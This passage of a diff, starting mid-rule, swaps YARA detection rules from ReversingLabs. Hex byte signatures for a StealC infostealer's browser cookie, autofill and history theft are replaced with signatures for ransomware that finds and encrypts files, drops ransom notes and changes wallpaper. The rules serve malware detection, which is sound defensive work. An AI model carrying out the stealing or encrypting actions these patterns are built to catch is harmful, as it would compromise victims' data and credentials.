-            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
-            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ??
-            ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ??
-            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00
-            11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13
-            ?? 00 28 ?? ?? ?? ?? DE
+		$encrypt_files_p1 = {
+            48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ??
+            ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57
+            F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D
+            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48
+            89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
+            ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7
+            83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48
+            89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ??
+            48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89
         }
-		$get_browser_cookies = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 38 ?? ?? ?? ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
-            16 2B ?? 17 00 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 14 (FE | 01) ?? 13 ??
-            11 ?? 2C ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 00
-            08 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 11 ?? 17 72 ?? ?? ?? ?? A2 00 11
-            ?? 18 11 ?? A2 00 11 ?? 19 72 ?? ?? ?? ?? A2 00 11 ?? 1A 11 ?? A2 00 11 ?? 1B 72 ??
-            ?? ?? ?? A2 00 11 ?? 1C 11 ?? A2 00 11 ?? 1D 72 ?? ?? ?? ?? A2 00 11 ?? 1E 11 ?? A2
-            00 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11
-            ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ??
-            16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
+		$encrypt_files_p2 = {
+            C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ??
+            48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ??
+            ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B
+            93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D
+            ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ??
+            ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
+            35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ??
+            ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B
+            14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ??
+            FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
         }
-		$take_screenshot = {
-            12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 28
-            ?? ?? ?? ?? 0A 06 12 ?? 16 16 28 ?? ?? ?? ?? 00 11 ?? 12 ?? 16 16 28 ?? ?? ?? ?? 00
-            11 ?? 08 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE
+		$drop_ransom_note = {
+            48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
+            89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ??
+            ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89
+            F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ??
+            ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ??
+            49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19
+            4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C
+            8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ??
+            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15
+            ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48
+            8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B
+            8C 24 ?? ?? ?? ?? 48 85 C9 74
         }
-		$get_antivirus_information = {
-            7E ?? ?? ?? ?? 0B 00 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            1B (FE | 02) ?? 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 00 11 ?? 6F ?? ?? ?? ??
-            13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 00 08 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 28
-            ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 08 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0C DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
-            11 ?? 3A ?? ?? ?? ?? 00 DE ?? 11 ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? 00 00 DC 08 0B DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00
-            07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 07 17 8D ?? ?? ?? ?? 13 ?? 11 ??
-            16 1F ?? 9D 11 ?? 6F ?? ?? ?? ?? 17 9A 16 8D ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0B 00 07 0A 2B ?? 06
+		$change_desktop_wallpaper = {
+            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
+            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74
+            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C
+            8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ??
+            ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C
+            8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ??
+            ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D
+            ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ??
+            ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55
         }
-		$get_browser_history = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
-            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17
-            D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 31 ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
+		$find_files_p1 = {
+            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
+            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74
+            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B
+            74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ??
+            ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85
+            DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8
+            ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC
+            48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ??
+            ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC
+        }
+		$find_files_p2 = {
+            73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68
+            ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ??
+            48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39
+            CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ??
+            4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C
+            24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B
+            54 24 ?? 4D 89 E8 E8
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $get_browser_autofill_data ) and ( $get_browser_cookies ) and ( $take_screenshot ) and ( $get_antivirus_information ) and ( $get_browser_history )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( $change_desktop_wallpaper )
 }
-rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects StealC infostealer."
+		description = "Yara rule that detects Apis ransomware."
 		author = "ReversingLabs"
-		id = "b53bbf15-3e94-513c-91a9-83dda421063b"
-		date = "2023-06-07"
-		modified = "2023-06-07"
+		id = "63791250-e21e-53d1-932c-9b5d16a7cad9"
+		date = "2021-11-25"
+		modified = "2021-11-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf"
+		logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "StealC"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Apis"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$resolve_windows_api = {
-            55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ??
-            89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35
+		$find_files = {
+            28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
+            69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ??
+            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+            ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ??
+            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ??
+            ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11
+            ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ??
+            28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
         }
-		$load_sqlite3_functions = {
-            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D
-            45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ??
-            B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70
-            ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ??
-            A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3
+		$encrypt_files = {
+            02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28
+            ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ??
